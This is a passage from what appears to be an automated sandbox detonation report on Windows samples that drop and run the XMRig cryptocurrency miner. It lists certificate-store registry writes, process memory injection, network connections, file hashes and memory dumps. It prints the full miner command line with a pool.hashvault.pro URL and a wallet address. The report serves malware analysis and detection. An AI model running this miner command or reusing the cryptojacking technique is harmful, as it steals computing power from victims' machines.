7469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2980 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2980 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2576-16-0x0000024D31910000-0x0000024D31930000-memory.dmp
memory/2576-17-0x0000024D33420000-0x0000024D33440000-memory.dmp
memory/2576-18-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-19-0x0000024D33440000-0x0000024D33460000-memory.dmp
memory/2576-20-0x0000024D33460000-0x0000024D33480000-memory.dmp
memory/2576-21-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-22-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-25-0x0000024D33460000-0x0000024D33480000-memory.dmp
memory/2576-24-0x0000024D33440000-0x0000024D33460000-memory.dmp
memory/2576-23-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-26-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-27-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-28-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-29-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-30-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-31-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-32-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-33-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-34-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-35-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-36-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-37-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-38-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-39-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-40-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-41-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-42-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-43-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-44-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-45-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-46-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-47-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-48-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-49-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-50-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-51-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-52-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-53-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-54-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-55-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-56-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-57-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-58-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-59-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-60-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-61-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-62-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-63-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-64-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-65-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-66-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-67-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-68-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-69-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-70-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-71-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-72-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-73-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-74-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-75-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-76-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-77-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-78-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-79-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-80-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-81-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-82-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-83-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-84-0x00007FF672A60000-0x00007FF673563000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:28
Platform
win10v2004-20240226-en
Max time kernel
1799s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2892 wrote to memory of 4492 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2892 wrote to memory of 4492 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4104 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4080 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| GB | 23.44.234.16:80 | tcp | |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.178.10:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4492-16-0x000001FA816A0000-0x000001FA816C0000-memory.dmp
memory/4492-17-0x000001FA816F0000-0x000001FA81710000-memory.dmp
memory/4492-18-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-19-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
